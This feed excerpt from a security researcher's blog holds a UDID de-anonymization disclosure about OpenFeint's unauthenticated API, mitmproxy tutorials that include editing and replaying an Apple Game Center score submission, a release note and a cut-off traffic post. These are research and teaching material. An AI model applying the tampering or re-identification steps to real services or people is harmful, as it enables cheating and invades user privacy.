href=\"http:\/\/mitmproxy.org\">mitmproxy<\/a>, a\nman-in-the-middle proxy that allows one to intercept and monitor SSL-encrypted\nHTTP traffic. Using mitmproxy to view the encrypted traffic sent by my own iOS\ndevices, I was able to observe protocols and data flows that have clearly\nreceived very little external review. 
A slew of interesting security results\nfollowed (keep an eye on this blog), but by far the most alarming was the fact\nthat it was possible to use OpenFeint to completely de-anonymize a large\nproportion of UDIDs.<\/p>\n<h2 id=\"de-anonymizing-udids-with-openfeint\">De-anonymizing UDIDs with OpenFeint<\/h2>\n<h3 id=\"linking-udids-to-openfeint-user-accounts\">Linking UDIDs to OpenFeint user accounts<\/h3>\n<p>When an OpenFeint-enabled app is first fired up, it submits the device's UDID to\nOpenFeint's servers, which then return a list of associated accounts:<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"plain\"><span class=\"giallo-l\"><span>https:\/\/api.openfeint.com\/users\/for_device.xml?udid=XXX<\/span><\/span><\/code><\/pre>\n<p>This is a completely unauthenticated call - you can try it out by cutting and\npasting it into your browser, replacing XXX with <a rel=\"external\" href=\"http:\/\/support.apple.com\/kb\/HT4061\">your own\nUDID<\/a>. 
Here's an example of the response for\nmy UDID, with sensitive information removed:<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"xml\"><span class=\"giallo-l\"><span>&lt;?<\/span><span style=\"color: #22863A;\">xml<\/span><span style=\"color: #6F42C1;\"> version<\/span><span>=<\/span><span style=\"color: #032F62;\">&quot;1.0&quot;<\/span><span style=\"color: #6F42C1;\"> encoding<\/span><span>=<\/span><span style=\"color: #032F62;\">&quot;UTF-8&quot;<\/span><span>?&gt;<\/span><\/span>\n<span class=\"giallo-l\"><span>&lt;<\/span><span style=\"color: #22863A;\">resources<\/span><span>&gt;<\/span><\/span>\n<span class=\"giallo-l\"><span>  &lt;<\/span><span style=\"color: #22863A;\">user<\/span><span>&gt;<\/span><\/span>\n<span class=\"giallo-l\"><span>    &lt;<\/span><span style=\"color: #22863A;\">chat_enabled<\/span><span>&gt;true&lt;\/<\/span><span style=\"color: #22863A;\">chat_enabled<\/span><span>&gt;<\/span><\/span>\n<span class=\"giallo-l\"><span>    &lt;<\/span><span style=\"color: #22863A;\">gamer_score<\/span><span>&gt;XXX&lt;\/<\/span><span style=\"color: #22863A;\">gamer_score<\/span><span>&gt;<\/span><\/span>\n<span class=\"giallo-l\"><span>    &lt;<\/span><span style=\"color: #22863A;\">id<\/span><span>&gt;XXX&lt;\/<\/span><span style=\"color: #22863A;\">id<\/span><span>&gt;<\/span><\/span>\n<span class=\"giallo-l\"><span>    &lt;<\/span><span style=\"color: #22863A;\">last_played_game_id<\/span><span>&gt;187402&lt;\/<\/span><span style=\"color: #22863A;\">last_played_game_id<\/span><span>&gt;<\/span><\/span>\n<span class=\"giallo-l\"><span>    &lt;<\/span><span style=\"color: #22863A;\">last_played_game_name<\/span><span>&gt;tiny wings&lt;\/<\/span><span style=\"color: #22863A;\">last_played_game_name<\/span><span>&gt;<\/span><\/span>\n<span class=\"giallo-l\"><span>    &lt;<\/span><span style=\"color: #22863A;\">lat<\/span><span>&gt;XXX&lt;\/<\/span><span style=\"color: 
#22863A;\">lat<\/span><span>&gt;<\/span><\/span>\n<span class=\"giallo-l\"><span>    &lt;<\/span><span style=\"color: #22863A;\">lng<\/span><span>&gt;XXX&lt;\/<\/span><span style=\"color: #22863A;\">lng<\/span><span>&gt;<\/span><\/span>\n<span class=\"giallo-l\"><span>    &lt;<\/span><span style=\"color: #22863A;\">online<\/span><span>&gt;false&lt;\/<\/span><span style=\"color: #22863A;\">online<\/span><span>&gt;<\/span><\/span>\n<span class=\"giallo-l\"><span>    &lt;<\/span><span style=\"color: #22863A;\">profile_picture_source<\/span><span>&gt;FbconnectCredential&lt;\/<\/span><span style=\"color: #22863A;\">profile_picture_source<\/span><span>&gt;<\/span><\/span>\n<span class=\"giallo-l\"><span>    &lt;<\/span><span style=\"color: #22863A;\">profile_picture_updated_at<\/span><span>&gt;XXX&lt;\/<\/span><span style=\"color: #22863A;\">profile_picture_updated_at<\/span><span>&gt;<\/span><\/span>\n<span class=\"giallo-l\"><span>    &lt;<\/span><span style=\"color: #22863A;\">profile_picture_url<\/span><span>&gt;http:\/\/XXX&lt;\/<\/span><span style=\"color: #22863A;\">profile_picture_url<\/span><span>&gt;<\/span><\/span>\n<span class=\"giallo-l\"><span>    &lt;<\/span><span style=\"color: #22863A;\">uploaded_profile_picture_content_type<\/span><span style=\"color: #6F42C1;\"> nil<\/span><span>=<\/span><span style=\"color: #032F62;\">&quot;true&quot;<\/span><span>&gt;<\/span><\/span>\n<span class=\"giallo-l\"><span>    &lt;\/<\/span><span style=\"color: #22863A;\">uploaded_profile_picture_content_type<\/span><span>&gt;<\/span><\/span>\n<span class=\"giallo-l\"><span>    &lt;<\/span><span style=\"color: #22863A;\">uploaded_profile_picture_file_name<\/span><span style=\"color: #6F42C1;\"> nil<\/span><span>=<\/span><span style=\"color: #032F62;\">&quot;true&quot;<\/span><span>&gt;<\/span><\/span>\n<span class=\"giallo-l\"><span>    &lt;\/<\/span><span style=\"color: #22863A;\">uploaded_profile_picture_file_name<\/span><span>&gt;<\/span><\/span>\n<span class=\"giallo-l\"><span>    &lt;<\/span><span style=\"color: 
#22863A;\">uploaded_profile_picture_file_size<\/span><span style=\"color: #6F42C1;\"> nil<\/span><span>=<\/span><span style=\"color: #032F62;\">&quot;true&quot;<\/span><span>&gt;<\/span><\/span>\n<span class=\"giallo-l\"><span>    &lt;\/<\/span><span style=\"color: #22863A;\">uploaded_profile_picture_file_size<\/span><span>&gt;<\/span><\/span>\n<span class=\"giallo-l\"><span>    &lt;<\/span><span style=\"color: #22863A;\">uploaded_profile_picture_updated_at<\/span><span style=\"color: #6F42C1;\"> nil<\/span><span>=<\/span><span style=\"color: #032F62;\">&quot;true&quot;<\/span><span>&gt;<\/span><\/span>\n<span class=\"giallo-l\"><span>    &lt;\/<\/span><span style=\"color: #22863A;\">uploaded_profile_picture_updated_at<\/span><span>&gt;<\/span><\/span>\n<span class=\"giallo-l\"><span>    &lt;<\/span><span style=\"color: #22863A;\">name<\/span><span>&gt;XXX&lt;\/<\/span><span style=\"color: #22863A;\">name<\/span><span>&gt;<\/span><\/span>\n<span class=\"giallo-l\"><span>  &lt;\/<\/span><span style=\"color: #22863A;\">user<\/span><span>&gt;<\/span><\/span>\n<span class=\"giallo-l\"><span>&lt;\/<\/span><span style=\"color: #22863A;\">resources<\/span><span>&gt;<\/span><\/span><\/code><\/pre>\n<p>Included are my latitude and longitude, the last game I played, my chosen\naccount name, and my Facebook profile picture URL.<\/p>\n<h2 id=\"linking-udids-to-gps-co-ordinates\">Linking UDIDs to GPS co-ordinates<\/h2>\n<p>If the user has opted to allow OpenFeint to use their location, latitude and\nlongitude are returned in the profile results. This lets us trivially associate\na UDID with GPS co-ordinates.<\/p>\n<p><em>The location leak was fixed by OpenFeint after my report. 
Although some\nportions of the OpenFeint API still return a user location, it seems that it\nis no longer served for direct profile requests.<\/em><\/p>\n<h2 id=\"linking-udids-to-facebook-profiles\">Linking UDIDs to Facebook profiles<\/h2>\n<p>If the user registered a Facebook account with OpenFeint, a profile picture URL\nhosted by the Facebook CDN was returned in the user's profile data. Facebook\nprofile picture URLs include the user's Facebook ID, directly linking the\nOpenFeint profile to their Facebook account.<\/p>\n<p>For example, here's Bruce Schneier's Facebook profile picture URL:<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"plain\"><span class=\"giallo-l\"><span>http:\/\/profile.ak.fbcdn.net\/hprofile-ak-snc4\/41795_60615378024_8092_n.jpg<\/span><\/span><\/code><\/pre>\n<p>The 11-digit number in this URL (60615378024) is his Facebook user ID. We can now view his\nprofile using a URL like this:<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"plain\"><span class=\"giallo-l\"><span>http:\/\/www.facebook.com\/profile.php?id=60615378024<\/span><\/span><\/code><\/pre>\n<p>This final step represents a complete de-anonymization of the UDID, directly\nlinking the supposedly anonymous identifier with a user's real-world identity.<\/p>\n<p><em>The Facebook ID leak was fixed by OpenFeint after my report.<\/em><\/p>\n<h2 id=\"openfeint-s-response\">OpenFeint's response<\/h2>\n<p>I reported this problem to OpenFeint on the 5th of April. I did not hear back from\nthem immediately, but I knew they were working on the problem because their API\nstopped returning GPS coordinates and Facebook profile picture URLs. On the\n12th, I received an email from Jason Citron, OpenFeint's CEO, who wanted to set\nup a phone conversation with me, him and an OpenFeint legal representative.  We\nspoke on the evening of the 20th of April. 
I recapped my findings and expressed\nconcern that their API still linked UDIDs to user accounts. They thanked me for\nthe vulnerability report, confirmed that they had tightened their API in\nresponse to it, and asked for more time to consider the issue before I released\nanything. The following morning, it was announced that OpenFeint had been\n<a rel=\"external\" href=\"http:\/\/openfeint.com\/company\/press\/33-GREE-Puts-Over-100-Million-into-OpenFeint-to-Drive-Global-Expansion-with-100M-users\">bought by GREE for $104\nmillion<\/a>.<\/p>\n<p>Last week I received what I assume is OpenFeint's last word on the matter, in\nthe form of an email from Jason Citron: \"We will continue to pay attention to\nthe issues you raised and will continue to adjust our practices as necessary.\"\nAt the time of writing, OpenFeint's API still allows you to associate a UDID\nwith private user information.<\/p>\n<h2 id=\"impact\">Impact<\/h2>\n<p>Testing with a small corpus of UDIDs gathered from my own and friends' devices,\nI was able to link roughly 30% of UDIDs to GPS co-ordinates, 20% of users to a\nweak identity (e.g.  OpenFeint profile picture, user-chosen account name), and\n10% of UDIDs directly to a Facebook profile. 
I stress that my sample was small\nand probably unrepresentative - only OpenFeint knows what the real numbers are.\nNone the less, we can make a broad guess at the magnitude of the problem, based\non the fact that OpenFeint <a rel=\"external\" href=\"http:\/\/openfeint.com\/company\/press\/33-GREE-Puts-Over-100-Million-into-OpenFeint-to-Drive-Global-Expansion-with-100M-users\">claims to have 75 million\nusers<\/a>:<\/p>\n<ul>\n<li>This would mean that about 7.5 million users may have had Facebook accounts\nlinked publicly to their UDIDs until OpenFeint stopped returning profile\npicture URLs a few weeks ago.<\/li>\n<li>About 22.5 million users may have had GPS co-ordinates linked publicly to\ntheir UDIDs until the issue was corrected.<\/li>\n<li>About 15 million users may still have identifying information like profile\npictures and user-chosen account names (that can often be used to identify\nusers) exposed.<\/li>\n<li>All 75 million users still have personal details like the last\nOpenFeint-enabled game they played and whether they are online (i.e. logged in\nto the OpenFeint network) exposed.<\/li>\n<\/ul>\n<p>Although the Facebook and GPS de-anonymization issues have been repaired, we\nhave to consider the possibility that these vulnerabilities have already been\nused to de-anonymize a database of UDIDs.<\/p>\n<h2 id=\"conclusion\">Conclusion<\/h2>\n<p>I want to stress that the problem here is not primarily with OpenFeint. By\ndesigning an API to expose UDIDs and encouraging developers to use it, Apple\nhas ensured that there are literally thousands of databases linking UDIDs to\nsensitive user information on the net. A leak from any one of these - or worse\na large-scale de-anonymization like the OpenFeint one - inevitably has serious\nconsequences for user privacy.<\/p>\n<div class=\"footnote-definition\" id=\"1\"><sup class=\"footnote-definition-label\">1<\/sup>\n<p>I should note that this is not quite accurate. 
The UDID is actually a\ncomputed value - a hash calculated over a set of identifying hardware\nattributes. In a sense, it only really exists as an API call.<\/p>\n<\/div>\n"},{"title":"mitmproxy: A 30-second client playback example","published":"2011-03-31T00:00:00+00:00","updated":"2011-03-31T00:00:00+00:00","link":{"@attributes":{"href":"https:\/\/corte.si\/posts\/code\/mitmproxy\/tute-30-seconds\/","type":"text\/html"}},"id":"https:\/\/corte.si\/posts\/code\/mitmproxy\/tute-30-seconds\/","content":"<p><a href=\"https:\/\/corte.si\/posts\/code\/mitmproxy\/announce0_4\/\">Yesterday<\/a> I published version 0.4 of\n<a rel=\"external\" href=\"http:\/\/mitmproxy.org\">mitmproxy<\/a> - an intercepting proxy for HTTP\/S traffic.\nThe tool already has pretty complete documentation, but I've decided to write a\nseries of less formal tutorials to showcase its abilities. Below is the first,\nand simplest, of these - keep an eye on the blog for more in the coming days.<\/p>\n<h2 id=\"a-30-second-client-playback-example\">A 30-second client playback example<\/h2>\n<p>My local cafe is serviced by a rickety and unreliable wireless network,\ngenerously sponsored with ratepayers' money by our city council. After\nconnecting, you  are redirected to an SSL-protected page that prompts you for a\nusername and password. Once you've entered your details, you are free to enjoy\nthe intermittent dropouts, treacle-like speeds and incorrectly configured\ntransparent proxy.<\/p>\n<p>I tend to automate this kind of thing at the first opportunity, on the theory\nthat time spent now will be more than made up in the long run. In this case, I\nmight use <a rel=\"external\" href=\"http:\/\/getfirebug.com\/\">Firebug<\/a> to ferret out the form post\nparameters and target URL, then fire up an editor to write a little script\nusing Python's <a rel=\"external\" href=\"http:\/\/docs.python.org\/library\/urllib.html\">urllib<\/a> to simulate\na submission. That's a lot of futzing about. 
With mitmproxy we can do the job\nin literally 30 seconds, without having to worry about any of the details.\nHere's how.<\/p>\n<h3 id=\"1-run-mitmdump-to-record-our-http-conversation-to-a-file\">1. Run mitmdump to record our HTTP conversation to a file.<\/h3>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"shellscript\"><span class=\"giallo-l\"><span style=\"color: #D73A49;\">&gt;<\/span><span> mitmdump -w wireless-login<\/span><\/span><\/code><\/pre><h3 id=\"2-point-your-browser-at-the-mitmdump-instance\">2. Point your browser at the mitmdump instance.<\/h3>\n<p>I use a tiny Firefox addon called <a rel=\"external\" href=\"https:\/\/addons.mozilla.org\/en-us\/firefox\/addon\/toggle-proxy-51740\/\">Toggle\nProxy<\/a> to\nswitch quickly to and from mitmproxy. I'm assuming you've already <a rel=\"external\" href=\"http:\/\/mitmproxy.org\/doc\/ssl.html\">configured\nyour browser with mitmproxy's SSL certificate\nauthority<\/a>.<\/p>\n<h3 id=\"3-log-in-as-usual\">3. Log in as usual.<\/h3>\n<p>And that's it! You now have a serialized version of the login process in the\nfile wireless-login, and you can replay it at any time like this:<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"shellscript\"><span class=\"giallo-l\"><span style=\"color: #D73A49;\">&gt;<\/span><span> mitmdump -c wireless-login<\/span><\/span><\/code><\/pre><h2 id=\"embellishments\">Embellishments<\/h2>\n<p>We're really done at this point, but there are a couple of embellishments we\ncould make if we wanted. I use <a rel=\"external\" href=\"http:\/\/wicd.sourceforge.net\/\">wicd<\/a> to\nautomatically join wireless networks I frequent, and it lets me specify a\ncommand to run after connecting. I used the client replay command above and\nvoila! 
- totally hands-free wireless network startup.<\/p>\n<p>We might also want to prune requests that download CSS, JS, images and so forth.\nThese add only a few moments to the time it takes to replay, but they're not\nreally needed and I somehow feel compelled to trim them anyway. So, we fire up the\nmitmproxy console tool on our serialized conversation, like so:<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"shellscript\"><span class=\"giallo-l\"><span style=\"color: #D73A49;\">&gt;<\/span><span> mitmproxy wireless-login<\/span><\/span><\/code><\/pre>\n<p>We can now go through and manually delete (using the <strong>d<\/strong> keyboard shortcut)\neverything we want to trim. When we're done, we use <strong>S<\/strong> to save the\nconversation back to the file.<\/p>\n"},{"title":"mitmproxy: Breaking Apple's Game Center with replay","published":"2011-03-31T00:00:00+00:00","updated":"2011-03-31T00:00:00+00:00","link":{"@attributes":{"href":"https:\/\/corte.si\/posts\/code\/mitmproxy\/tute-gamecenter\/","type":"text\/html"}},"id":"https:\/\/corte.si\/posts\/code\/mitmproxy\/tute-gamecenter\/","content":"<p>This is the second in the series of tutorials I'm writing for\n<a rel=\"external\" href=\"http:\/\/mitmproxy.org\">mitmproxy<\/a>. You can find the first one - a 30-second\ntutorial on client replay - <a href=\"https:\/\/corte.si\/posts\/code\/mitmproxy\/tute-30-seconds\/\">here<\/a>.\nThere will be more to come in the next few days.<\/p>\n<h2 id=\"the-setup\">The setup<\/h2>\n<p>In this tutorial, I'm going to show you how simple it is to creatively interfere\nwith Apple Game Center traffic using mitmproxy. To set things up, I registered\nmy mitmproxy CA certificate with my iPhone - there's a <a rel=\"external\" href=\"http:\/\/mitmproxy.org\/doc\/certinstall\/ios.html\">step by step set of\ninstructions<\/a> for doing this in\nthe mitmproxy docs. 
I then started mitmproxy on my desktop, and configured the\niPhone to use it as a proxy.<\/p>\n<h2 id=\"taking-a-look-at-the-game-center-traffic\">Taking a look at the Game Center traffic<\/h2>\n<p>Let's take a first look at the Game Center traffic. The game I'll use in this\ntutorial is <a rel=\"external\" href=\"http:\/\/itunes.apple.com\/us\/app\/super-mega-worm\/id388541990?mt=8\">Super Mega\nWorm<\/a> - a great\nlittle retro-apocalyptic sidescroller for the iPhone:<\/p>\n<div class=\"media\">\n    <a href=\"supermega.png\">\n        <img src=\"supermega.png\"  \/>\n    <\/a>\n\n    \n<\/div>\n<p>After finishing a game (take your time), watch the traffic flowing through\nmitmproxy:<\/p>\n<div class=\"media\">\n    <a href=\"one.png\">\n        <img src=\"one.png\"  \/>\n    <\/a>\n\n    \n<\/div>\n<p>We see a bunch of things we might expect - initialisation, the retrieval of\nleaderboards and so forth. Then, right at the end, there's a POST to this\ntantalising URL:<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"plain\"><span class=\"giallo-l\"><span>https:\/\/service.gc.apple.com\/WebObjects\/GKGameStatsService.woa\/wa\/submitScore<\/span><\/span><\/code><\/pre>\n<p>The contents of the submission are particularly interesting:<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"xml\"><span class=\"giallo-l\"><span>&lt;<\/span><span style=\"color: #22863A;\">plist<\/span><span style=\"color: #6F42C1;\"> version<\/span><span>=<\/span><span style=\"color: #032F62;\">&quot;1.0&quot;<\/span><span>&gt;<\/span><\/span>\n<span class=\"giallo-l\"><span>&lt;<\/span><span style=\"color: #22863A;\">dict<\/span><span>&gt;<\/span><\/span>\n<span class=\"giallo-l\"><span>    &lt;<\/span><span style=\"color: #22863A;\">key<\/span><span>&gt;category&lt;\/<\/span><span style=\"color: #22863A;\">key<\/span><span>&gt;<\/span><\/span>\n<span class=\"giallo-l\"><span>    
&lt;<\/span><span style=\"color: #22863A;\">string<\/span><span>&gt;SMW_Adv_USA1&lt;\/<\/span><span style=\"color: #22863A;\">string<\/span><span>&gt;<\/span><\/span>\n<span class=\"giallo-l\"><span>    &lt;<\/span><span style=\"color: #22863A;\">key<\/span><span>&gt;score-value&lt;\/<\/span><span style=\"color: #22863A;\">key<\/span><span>&gt;<\/span><\/span>\n<span class=\"giallo-l\"><span>    &lt;<\/span><span style=\"color: #22863A;\">integer<\/span><span>&gt;55&lt;\/<\/span><span style=\"color: #22863A;\">integer<\/span><span>&gt;<\/span><\/span>\n<span class=\"giallo-l\"><span>    &lt;<\/span><span style=\"color: #22863A;\">key<\/span><span>&gt;timestamp&lt;\/<\/span><span style=\"color: #22863A;\">key<\/span><span>&gt;<\/span><\/span>\n<span class=\"giallo-l\"><span>    &lt;<\/span><span style=\"color: #22863A;\">integer<\/span><span>&gt;1301553284461&lt;\/<\/span><span style=\"color: #22863A;\">integer<\/span><span>&gt;<\/span><\/span>\n<span class=\"giallo-l\"><span>&lt;\/<\/span><span style=\"color: #22863A;\">dict<\/span><span>&gt;<\/span><\/span>\n<span class=\"giallo-l\"><span>&lt;\/<\/span><span style=\"color: #22863A;\">plist<\/span><span>&gt;<\/span><\/span><\/code><\/pre>\n<p>This is a <a rel=\"external\" href=\"http:\/\/en.wikipedia.org\/wiki\/Property_list\">property list<\/a>,\ncontaining an identifier for the game, a score (55, in this case), and a\ntimestamp. Looks pretty simple to mess with.<\/p>\n<h2 id=\"modifying-and-replaying-the-score-submission\">Modifying and replaying the score submission<\/h2>\n<p>Let's edit the score submission. First, select it in mitmproxy, then press\n<strong>enter<\/strong> to view it. Make sure you're viewing the request, not the response -\nyou can use <strong>tab<\/strong> to flick between the two. Now press <strong>e<\/strong> for edit. You'll\nbe prompted for the part of the request you want to change - press <strong>b<\/strong> for\nbody.  
Your preferred editor (taken from the EDITOR environment variable) will\nnow fire up. Let's bump the score up to something a bit more ambitious:<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"xml\"><span class=\"giallo-l\"><span>&lt;<\/span><span style=\"color: #22863A;\">plist<\/span><span style=\"color: #6F42C1;\"> version<\/span><span>=<\/span><span style=\"color: #032F62;\">&quot;1.0&quot;<\/span><span>&gt;<\/span><\/span>\n<span class=\"giallo-l\"><span>&lt;<\/span><span style=\"color: #22863A;\">dict<\/span><span>&gt;<\/span><\/span>\n<span class=\"giallo-l\"><span>    &lt;<\/span><span style=\"color: #22863A;\">key<\/span><span>&gt;category&lt;\/<\/span><span style=\"color: #22863A;\">key<\/span><span>&gt;<\/span><\/span>\n<span class=\"giallo-l\"><span>    &lt;<\/span><span style=\"color: #22863A;\">string<\/span><span>&gt;SMW_Adv_USA1&lt;\/<\/span><span style=\"color: #22863A;\">string<\/span><span>&gt;<\/span><\/span>\n<span class=\"giallo-l\"><span>    &lt;<\/span><span style=\"color: #22863A;\">key<\/span><span>&gt;score-value&lt;\/<\/span><span style=\"color: #22863A;\">key<\/span><span>&gt;<\/span><\/span>\n<span class=\"giallo-l\"><span>    &lt;<\/span><span style=\"color: #22863A;\">integer<\/span><span>&gt;2200272667&lt;\/<\/span><span style=\"color: #22863A;\">integer<\/span><span>&gt;<\/span><\/span>\n<span class=\"giallo-l\"><span>    &lt;<\/span><span style=\"color: #22863A;\">key<\/span><span>&gt;timestamp&lt;\/<\/span><span style=\"color: #22863A;\">key<\/span><span>&gt;<\/span><\/span>\n<span class=\"giallo-l\"><span>    &lt;<\/span><span style=\"color: #22863A;\">integer<\/span><span>&gt;1301553284461&lt;\/<\/span><span style=\"color: #22863A;\">integer<\/span><span>&gt;<\/span><\/span>\n<span class=\"giallo-l\"><span>&lt;\/<\/span><span style=\"color: #22863A;\">dict<\/span><span>&gt;<\/span><\/span>\n<span class=\"giallo-l\"><span>&lt;\/<\/span><span style=\"color: 
#22863A;\">plist<\/span><span>&gt;<\/span><\/span><\/code><\/pre>\n<p>Save the file and exit your editor.<\/p>\n<p>The final step is to replay this modified request. Simply press <strong>r<\/strong> for\nreplay.<\/p>\n<h2 id=\"the-glorious-result-and-some-intrigue\">The glorious result and some intrigue<\/h2>\n<div class=\"media\">\n    <a href=\"leaderboard.png\">\n        <img src=\"leaderboard.png\"  \/>\n    <\/a>\n\n    \n<\/div>\n<p>And that's it - according to the records, I am the greatest Super Mega Worm\nplayer of all time.<\/p>\n<p>Curiously, the top competitors' scores are all the same: 2,147,483,647. If you\nthink that number seems familiar, you're right: it's 2^31-1, the maximum value\nyou can fit into a signed 32-bit int. Now let me tell you another peculiar\nthing about Super Mega Worm - at the end of every game, it submits your highest\nprevious score to the Game Center, not your current score.  This means that it\nstores your highscore somewhere, and I'm guessing that it reads that stored\nscore back into a signed integer. So, if you <em>were<\/em> to cheat by the relatively\npedestrian means of modifying the saved score on your jailbroken phone, then\n2^31-1 might well be the maximum score you could get. Then again, if the game\nitself stores its score in a signed 32-bit int, you could get the same score\nthrough perfect play, effectively beating the game. So, which is it in this\ncase? I'll leave that for you to decide.<\/p>\n"},{"title":"mitmproxy 0.4 has been released","published":"2011-03-30T00:00:00+00:00","updated":"2011-03-30T00:00:00+00:00","link":{"@attributes":{"href":"https:\/\/corte.si\/posts\/code\/mitmproxy\/announce0_4\/","type":"text\/html"}},"id":"https:\/\/corte.si\/posts\/code\/mitmproxy\/announce0_4\/","content":"<div class=\"media\">\n    <a href=\"..&#x2F;mitmproxy_0_4.png\">\n        <img src=\"..&#x2F;mitmproxy_0_4.png\"  \/>\n    <\/a>\n\n    \n<\/div>\n<p>I've just tagged and released mitmproxy 0.4. 
You can download it from the new\nproject website:<\/p>\n<h2 id=\"mitmproxy-org\"><a rel=\"external\" href=\"http:\/\/mitmproxy.org\">mitmproxy.org<\/a><\/h2>\n<p>This is a huge update, with dozens\nof new features, and improvements to almost every aspect of the project.  A few\nhighlights are:<\/p>\n<ul>\n<li>Complete serialization of HTTP\/S conversations<\/li>\n<li>On-the-fly generation of SSL interception certificates<\/li>\n<li>Ability to replay both the client and the server side of HTTP\/S conversations<\/li>\n<li>mitmdump has grown up to be a powerful tcpdump-like commandline tool for HTTP\/S<\/li>\n<li>Scripting hooks for programmatic modification of traffic using Python<\/li>\n<li>Many, many user interface improvements, bug fixes, and minor features<\/li>\n<li>Better <a rel=\"external\" href=\"http:\/\/mitmproxy.org\/doc\/index.html\">documentation<\/a>.<\/li>\n<\/ul>\n<p>Special thanks go to <a rel=\"external\" href=\"http:\/\/www.henriknordstrom.net\/\">Henrik Nordstr\u00f6m<\/a> for\nmany great contributions to this release. I'd love more contributors to join\nthe project - if you feel like hacking on mitmproxy, take a look at the\n<a rel=\"external\" href=\"https:\/\/github.com\/cortesi\/mitmproxy\/blob\/master\/todo\">todo<\/a> file at the top\nof the tree for ideas.<\/p>\n<p>Over the next week I will write a series of tutorials to showcase mitmproxy's\nabilities, ranging from simple to quite complex. Keep an eye on the blog for\nthese - they will be published here first, before making their way into the\nofficial documentation.<\/p>\n"},{"title":"Social news eats a blog post","published":"2011-01-24T00:00:00+00:00","updated":"2011-01-24T00:00:00+00:00","link":{"@attributes":{"href":"https:\/\/corte.si\/posts\/socialmedia\/post-lifecycle\/","type":"text\/html"}},"id":"https:\/\/corte.si\/posts\/socialmedia\/post-lifecycle\/","content":"<p>This is the second post in which I try to add some data to my nagging doubts\nabout the technical news ecosystem. 
In my <a href=\"https:\/\/corte.si\/posts\/socialmedia\/redditgraph\/\">previous\npost<\/a>, I showed off a visualisation of\nhow the proggit front page changes over time. In this post, I take a look at the\nflip-side of the coin - what happens to a specific post as it passes through the\nshort, fickle social news cycle?  To do this, I'll take a deep dive into my own\nserver logs, looking at a <a href=\"https:\/\/corte.si\/posts\/code\/cyclesort\/\">recent post of mine<\/a>\nthat appeared briefly on both <a rel=\"external\" href=\"http:\/\/news.ycombinator.com\">Hacker News<\/a> and\n<a rel=\"external\" href=\"http:\/\/www.reddit.com\/r\/programming\">proggit<\/a>. I'd guess that nearly all posts\nfollow more or less the same trajectory as they are extruded through the social\nnews mill, so this should be interesting to more people than just me. At the\nrisk of making things a bit dry and descriptive, I'm saving speculation and\ninterpretation for a future post.<\/p>\n<p>The scene is set at about 10pm New Zealand time, when I put the finishing\ntouches to my blog post, and fire off an rsync up to my server. I quickly\ndouble-check that the blog and the RSS feed have updated OK, <a rel=\"external\" href=\"http:\/\/twitter.com\/cortesi\/status\/6627667512131584\">tweet a\nlink<\/a> to the post, and go to\nbed. While I sleep, the post creeps onto both Hacker News and proggit,\nultimately getting 41,000 hits over the next 5 days or so. The graphs below show\nonly the first 50 hours of the post's lifetime - everything after that is just a\nlong, slow d\u00e9nouement as it dwindles into obscurity.<\/p>\n<h2 id=\"our-real-time-robot-overlords\">Our real-time robot overlords<\/h2>\n<p>The action starts almost as soon as I click the \"tweet\" button. Within seconds,\nthe post is retrieved by Twitterbot. One second later, Googlebot appears, and\nalmost simultaneously I get hit by Jaxified, NJuice, LinkedIn and PostRank. 
In\nall, 10 bots read my blog post within the first minute, handily beating the\nfirst human, who slouches lethargically into view at a tardy 90 seconds.<\/p>\n<p>Below is a list of the bots that retrieved my post before the first submission\nto a social news site. These are the realtime robots, presumably hoovering up\nthe Twitter firehose and indexing all the links they find. The cast of\ncharacters is a mixture of the expected big fish, stealth startups, and\nskunkworks projects at well-known companies. Bot identity was gleaned from HTTP\n<a rel=\"external\" href=\"http:\/\/en.wikipedia.org\/wiki\/User_agent\">user-agent<\/a> headers when they were\nprovided, or by checking the ownership of the responsible IP through reverse DNS\nresolution and whois lookups when they weren't. Most of the real-time bots were\nwell behaved, identifying themselves clearly with a URL in the user-agent\nstring.<\/p>\n<style>\n    .soctable td {\n        padding-left: 0 !important;\n    }\n<\/style>\n<table class=\"soctable\">\n    <tr>\n        <th>minutes after publication<\/th>\n        <th>bot<\/th>\n    <\/tr>\n    <tr>\n        <td rowspan=\"10\">1<\/td> <td><a href=\"http:\/\/twitter.com\">Twitter<\/a><\/td>\n    <\/tr>\n    <tr>\n        <td><a href=\"http:\/\/www.google.com\/bot.html\">Google<\/a><\/td>\n    <\/tr>\n    <tr>\n        <td><a href=\"http:\/\/www.jaxified.com\/crawler\">Jaxified<\/a><\/td>\n    <\/tr>\n    <tr>\n        <td><a href=\"http:\/\/njuice.com\/\">NJuice<\/a><\/td>\n    <\/tr>\n    <tr>\n        <td><a href=\"http:\/\/www.linkedin.com\">LinkedIn<\/a><\/td>\n    <\/tr>\n    <tr>\n        <td><a href=\"http:\/\/www.postrank.com\/\">PostRank<\/a><\/td>\n    <\/tr>\n    <tr>\n        <td>Unidentified bot from a Microsoft-owned IP<\/td>\n    <\/tr>\n    <tr>\n        <td><a href=\"http:\/\/help.yahoo.com\/help\/us\/ysearch\/slurp\">Yahoo! 
